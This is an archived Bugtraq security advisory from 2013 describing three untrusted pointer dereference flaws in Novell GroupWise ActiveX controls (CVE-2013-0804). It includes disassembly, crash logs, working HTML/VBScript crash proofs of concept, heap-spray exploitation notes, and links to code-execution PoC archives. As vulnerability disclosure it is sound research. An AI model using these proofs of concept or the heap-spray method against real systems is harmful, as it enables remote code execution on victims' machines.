lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <20130403114030.B37AA2C46D2B@htbridge.ch>
Date: Wed,  3 Apr 2013 13:40:30 +0200 (CEST)
From: advisory@...ridge.com
To: bugtraq@...urityfocus.com
Subject: Novell GroupWise Multiple Remote Code Execution Vulnerabilities

Advisory ID: HTB23131
Product: Novell GroupWise
Vendor: Novell Inc.
Vulnerable Version(s): 12.0.0.8586 and probably prior
Tested Version: 12.0.0.8586 on Windows 7 SP1 and Internet Explorer 9.0
Vendor Notification: November 26, 2012 
Vendor Patch: January 30, 2013 
Public Disclosure: April 3, 2013 
Vulnerability Type: Untrusted Pointer Dereference [CWE-822]
CVE Reference: CVE-2013-0804
Risk Level: Critical 
CVSSv2 Base Score: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple untrusted pointer dereference vulnerabilities in Novell GroupWise, which could be exploited to compromise a remote system.


1) Untrusted Pointer Dereference in Novell GroupWise: CVE-2013-0804

1.1 The vulnerability exists due to an untrusted pointer dereference error in the InvokeContact() method within the ActiveX control (gwabdlg.dll, GUID {54AD9EC4-BB4A-4D66-AE1E-D6780930B9EF}, located by default in "C:\Program Files\Novell\GroupWise\gwabdlg.dll"

A remote attacker can pass an arbitrary value to the pInvokeParams argument of the InvokeContact() method and trigger the ACCESS_VIOLATION exception on a MOV EAX, DWORD  PTR [EAX+4] instruction. 

Since it is conceivable to supply a custom pointer, an attacker can exploit this vulnerability relying on the heap-spray technique. After the crash, the application moves the value of the supplied pointer plus four bytes into the EAX register.

5722D301   8B40 04          MOV EAX,DWORD PTR DS:[EAX+4]

Later this value will be allocated into the stack:

5722D304   8985 24FFFFFF    MOV DWORD PTR SS:[EBP-DC],EAX

The code continues its flow and enters a switch case algorithm:


5722D30A   83BD 24FFFFFF 01 CMP DWORD PTR SS:[EBP-DC],1
5722D311   0F84 57010000    JE gwabdlg.5722D46E
5722D317   83BD 24FFFFFF 02 CMP DWORD PTR SS:[EBP-DC],2
5722D31E   0F84 00010000    JE gwabdlg.5722D424

5722D324   83BD 24FFFFFF 03 CMP DWORD PTR SS:[EBP-DC],3

5722D32B   0F84 83010000    JE gwabdlg.5722D4B4
5722D331   83BD 24FFFFFF 04 CMP DWORD PTR SS:[EBP-DC],4
5722D338   0F84 AF020000    JE gwabdlg.5722D5ED
5722D33E   83BD 24FFFFFF 05 CMP DWORD PTR SS:[EBP-DC],5
5722D345   0F84 9A030000    JE gwabdlg.5722D6E5
5722D34B   83BD 24FFFFFF 06 CMP DWORD PTR SS:[EBP-DC],6


If an attacker can specify a custom switch value, in this case the number 3, it will jump to the address 0x5722D4B4

5722D4B4   8B45 08          MOV EAX,DWORD PTR SS:[EBP+8]
5722D4B7   8945 D4          MOV DWORD PTR SS:[EBP-2C],EAX
5722D4BA   8365 D8 00     AND DWORD PTR SS:[EBP-28],0
5722D4BE   8D45 D8          LEA EAX,DWORD PTR SS:[EBP-28]
5722D4C1   50                   PUSH EAX
5722D4C2   68 58122D57    PUSH gwabdlg.572D1258
5722D4C7   8B45 D4          MOV EAX,DWORD PTR SS:[EBP-2C]
5722D4CA   8B40 30          MOV EAX,DWORD PTR DS:[EAX+30]
5722D4CD   8B4D D4         MOV ECX,DWORD PTR SS:[EBP-2C]
5722D4D0   8B49 30           MOV ECX,DWORD PTR DS:[ECX+30]
5722D4D3   8B00               MOV EAX,DWORD PTR DS:[EAX]
5722D4D5   51                   PUSH ECX
5722D4D6   FF10              CALL DWORD PTR DS:[EAX]

After entering into this function, and since the EAX register is completely under the attacker control, it is possible to supply another custom pointer that will be executed after the code reaches the CALL DWORD PTR DS:[EAX] instruction:


0C0C0C0C   0C 0C           OR AL,0C
0C0C0C0E   0C 0C            OR AL,0C
0C0C0C10   0300              ADD EAX,DWORD PTR DS:[EAX]
0C0C0C12   0000              ADD BYTE PTR DS:[EAX],AL
0C0C0C14   0C 0C            OR AL,0C
0C0C0C16   0C 0C            OR AL,0C
0C0C0C18   0C 0C            OR AL,0C
0C0C0C1A   0C 0C           OR AL,0C



Crash details:

(162c.5ae0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0c0c0c08 ebx=572caacc ecx=57307f00 edx=0029677a esi=00296754 edi=001deda4
eip=5722d301 esp=001dec3c ebp=001ded24 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210202
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Novell\GroupWise\gwabdlg.dll - 
gwabdlg!DllUnregisterServer+0x4c10e:
5722d301 8b4004          mov     eax,dword ptr [eax+4] ds:0023:0c0c0c0c=????????



The following PoC will crash Internet Explorer 7/8/9:

<html>
<!-- (c)oded by High-Tech Bridge Security Research Lab -->
<head>
<title> Novell GroupWise Multiple Remote Code Execution vulnerabilities v.12.0.0.8586</title>
</head>
<script language='vbscript'>
Sub PoC()
 arg1=202116104
 target.InvokeContact arg1 
End Sub
</script>
<body>
<h3> Novell GroupWise Multiple Remote Code Execution vulnerabilities v.12.0.0.8586</h3>
<h4> Untrusted Pointer Dereference PoC </h4>
<hr>
This simple PoC will crash Internet Explorer v9.0 when trying to read the arbitrary address 0x0c0c0c0c.<BR><BR>
<input language=VBScript onclick=PoC() type=button value="Proof of Concept">
</body>
<object classid='clsid:54AD9EC4-BB4A-4D66-AE1E-D6780930B9EF'
id='Target'></object>
</html>



Code execution PoC:
The following PoC code will first spray the heap with the 0x0C byte, as a typical "No Operation" sled for a heap-spray exploitation. Following this the 0xCC byte (Interrupt 3 - trap to debugger) illustrates the beginning of shellcode.
<a href="https://www.htbridge.com/advisory/HTB23131_POC_1.zip">https://www.htbridge.com/advisory/HTB23131_POC_1.zip</a>
Archive's Password: HTB23131_novell(gw)


1.2 The vulnerability exists due to an untrusted pointer dereference error in the GenerateSummaryPage() method within the ActiveX control (gwabdlg.dll, GUID {54AD9EC4-BB4A-4D66-AE1E-D6780930B9EF}, located by default in "C:\Program Files\Novell\GroupWise\gwabdlg.dll".

A remote attacker can pass an arbitrary value to the pInvokeParams argument of the GenerateSummaryPage() method and trigger the ACCESS_VIOLATION exception on a MOV EAX, DWORD  PTR [EAX+4] instruction. 

Since it is conceivable to supply a custom pointer, an attacker can exploit this vulnerability relying on the heap-spray technique. After the crash, the application moves the value of the supplied pointer plus four bytes into the EAX register.

5722D301   8B40 04          MOV EAX,DWORD PTR DS:[EAX+4]

Later this value will be allocated into the stack:

5722D304   8985 24FFFFFF    MOV DWORD PTR SS:[EBP-DC],EAX

The code continues its flow and enters a switch case algorithm:

5722D30A   83BD 24FFFFFF 01 CMP DWORD PTR SS:[EBP-DC],1
5722D311   0F84 57010000    JE gwabdlg.5722D46E
5722D317   83BD 24FFFFFF 02 CMP DWORD PTR SS:[EBP-DC],2
5722D31E   0F84 00010000    JE gwabdlg.5722D424

5722D324   83BD 24FFFFFF 03 CMP DWORD PTR SS:[EBP-DC],3

5722D32B   0F84 83010000    JE gwabdlg.5722D4B4
5722D331   83BD 24FFFFFF 04 CMP DWORD PTR SS:[EBP-DC],4
5722D338   0F84 AF020000    JE gwabdlg.5722D5ED
5722D33E   83BD 24FFFFFF 05 CMP DWORD PTR SS:[EBP-DC],5
5722D345   0F84 9A030000    JE gwabdlg.5722D6E5
5722D34B   83BD 24FFFFFF 06 CMP DWORD PTR SS:[EBP-DC],6


If an attacker can specify a custom switch value, in this case the number 3, it will jump to address 0x5722D4B4

5722D4B4   8B45 08          MOV EAX,DWORD PTR SS:[EBP+8]
5722D4B7   8945 D4          MOV DWORD PTR SS:[EBP-2C],EAX
5722D4BA   8365 D8 00       AND DWORD PTR SS:[EBP-28],0
5722D4BE   8D45 D8          LEA EAX,DWORD PTR SS:[EBP-28]
5722D4C1   50               PUSH EAX
5722D4C2   68 58122D57      PUSH gwabdlg.572D1258
5722D4C7   8B45 D4          MOV EAX,DWORD PTR SS:[EBP-2C]
5722D4CA   8B40 30          MOV EAX,DWORD PTR DS:[EAX+30]
5722D4CD   8B4D D4          MOV ECX,DWORD PTR SS:[EBP-2C]
5722D4D0   8B49 30          MOV ECX,DWORD PTR DS:[ECX+30]
5722D4D3   8B00             MOV EAX,DWORD PTR DS:[EAX]
5722D4D5   51               PUSH ECX
5722D4D6   FF10             CALL DWORD PTR DS:[EAX]

After entering into this function, and since the EAX register is completely under the attacker control, it is possible to supply another custom pointer that will be executed after the code reaches the CALL DWORD PTR DS:[EAX] instruction.

0C0C0C0C   0C 0C           OR AL,0C
0C0C0C0E   0C 0C            OR AL,0C
0C0C0C10   0300              ADD EAX,DWORD PTR DS:[EAX]
0C0C0C12   0000              ADD BYTE PTR DS:[EAX],AL
0C0C0C14   0C 0C            OR AL,0C
0C0C0C16   0C 0C            OR AL,0C
0C0C0C18   0C 0C            OR AL,0C
0C0C0C1A   0C 0C           OR AL,0C



Crash details:

(162c.5ae0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0c0c0c08 ebx=572caacc ecx=57307f00 edx=0029677a esi=00296754 edi=001deda4
eip=5722d301 esp=001dec3c ebp=001ded24 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210202
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Novell\GroupWise\gwabdlg.dll - 
gwabdlg!DllUnregisterServer+0x4c10e:
5722d301 8b4004          mov     eax,dword ptr [eax+4] ds:0023:0c0c0c0c=????????



The following PoC will crash Internet Explorer 7/8/9:

<html>
<!-- (c)oded by High-Tech Bridge Security Research Lab -->
<head>
<title>Novell GroupWise Multiple Remote Code Execution vulnerabilities v.12.0.0.8586</title>
</head>
<script language='vbscript'>
Sub PoC()
arg1=202116108
arg2="defaultV"
arg3="defaultV"
target.GenerateSummaryPage arg1 ,arg2 ,arg3
End Sub
</script>
<body>
<h3> Novell GroupWise Multiple Remote Code Execution vulnerabilities v.12.0.0.8586</h3>
<h4>Untrusted Pointer Dereference PoC</h4>
<hr>
This simple PoC will crash Internet Explorer v9.0 when trying to read the arbitrary address 
0x0c0c0c0c.<BR><BR>
<input language=VBScript onclick=PoC() type=button value="Proof of Concept">
</body>
<object classid='clsid:54AD9EC4-BB4A-4D66-AE1E-D6780930B9EF'
id='Target'></object>
</html>



Code execution PoC:
The following PoC code will first spray the heap with the 0x0C byte, as a typical "No Operation" sled for a heap-spray exploitation. Following this the 0xCC byte (Interrupt 3 - trap to debugger) illustrates the beginning of shellcode.
<a href="https://www.htbridge.com/advisory/HTB23131_POC_2.zip">https://www.htbridge.com/advisory/HTB23131_POC_2.zip</a>
Archive's Password: HTB23131_novell(gw)


1.3 The vulnerability exists due to an untrusted pointer dereference error in the SecManageRecipientCertificates() method within the ActiveX control (gwmim1.ocx, GUID {BFEC5A01-1EB1-11D1-BC96-00805FC1C85A}, located by default in "C:\Program Files\Novell\GroupWise\gwmim1.ocx".

A remote attacker can pass an arbitrary value to the lProp argument of the SecManageRecipientCertificates() method and trigger the ACCESS_VIOLATION exception on a MOV EDX,DWORD PTR DS:[ECX] instruction. 
Since it is possible to supply a specially crafted pointer, an attacker can abuse this flaw relying on the heap-spray technique. After the crash, the application moves the value of the supplied pointer into the EDX register.
10014805   MOV EDX,DWORD PTR DS:[ECX]

Later the same operation is performed, however this time it is the EAX register that inherits the untrusted pointer value.
10014807   MOV EAX,DWORD PTR DS:[EDX]

Eventually code execution is reached at the address 0x10014809
10014809   CALL EAX


Crash details:

(5c78.58f0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0275c46c ebx=00000000 ecx=0c0c0c0c edx=0000001b esi=0956de40 edi=00000000
eip=10014805 esp=0275c45c ebp=0275c55c iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210206
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\PROGRA~1\Novell\GROUPW~1\gwmim1.ocx - 
gwmim1!DllUnregisterServer+0x8cb5:
10014805 8b11            mov     edx,dword ptr [ecx]  ds:0023:0c0c0c0c=????????



The following PoC will crash Internet Explorer 7/8/9:

<html>
<!-- (c)oded by High-Tech Bridge Security Research Lab -->
<head>
<title>Novell GroupWise Multiple Remote Code Execution vulnerabilities v.12.0.0.8586</title>
</head>
<script language='vbscript'>
Sub PoC()
 arg1=202116108
 target.SecManageRecipientCertificates arg1
End Sub
</script>
<body>
<h3>Novell GroupWise Multiple Remote Code Execution vulnerabilities v.12.0.0.8586</h3>
<h4> Untrusted Pointer Dereference PoC </h4>
<hr>
This simple PoC will crash Internet Explorer v9.0 when trying to read the arbitrary address 0x0c0c0c0c.<BR><BR>
<input language=VBScript onclick=PoC() type=button value="Proof of Concept">
</body>
<object classid='clsid:BFEC5A01-1EB1-11D1-BC96-00805FC1C85A'id='Target'></object>          
</html>



Code execution PoC:
The following PoC code will first spray the heap with the 0x0C byte, as a typical "No Operation" sled for a heap-spray exploitation. Following this the 0xCC byte (Interrupt 3 - trap to debugger) illustrates the beginning of shellcode.
<a href="https://www.htbridge.com/advisory/HTB23131_POC_3.zip">https://www.htbridge.com/advisory/HTB23131_POC_3.zip</a>
Archive's Password: HTB23131_novell(gw)


-----------------------------------------------------------------------------------------------

Solution:

Apply GroupWise 8.0.3 Hot Patch 2 (or later) or GroupWise 2012 SP1 Hot Patch 1

More Information:
http://www.novell.com/support/kb/doc.php?id=7011687

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23131 - https://www.htbridge.com/advisory/HTB23131 - Novell GroupWise Multiple Remote Code Execution Vulnerabilities.
[2] Novell Inc. - http://www.novell.com - Novell GroupWise is a collaboration software for large enterprises.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] Novell GroupWise Untrusted Pointer Dereference Exploitation - https://www.htbridge.com/publications/novell_groupwise_untrusted_pointer_dereference_exploitation.html

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ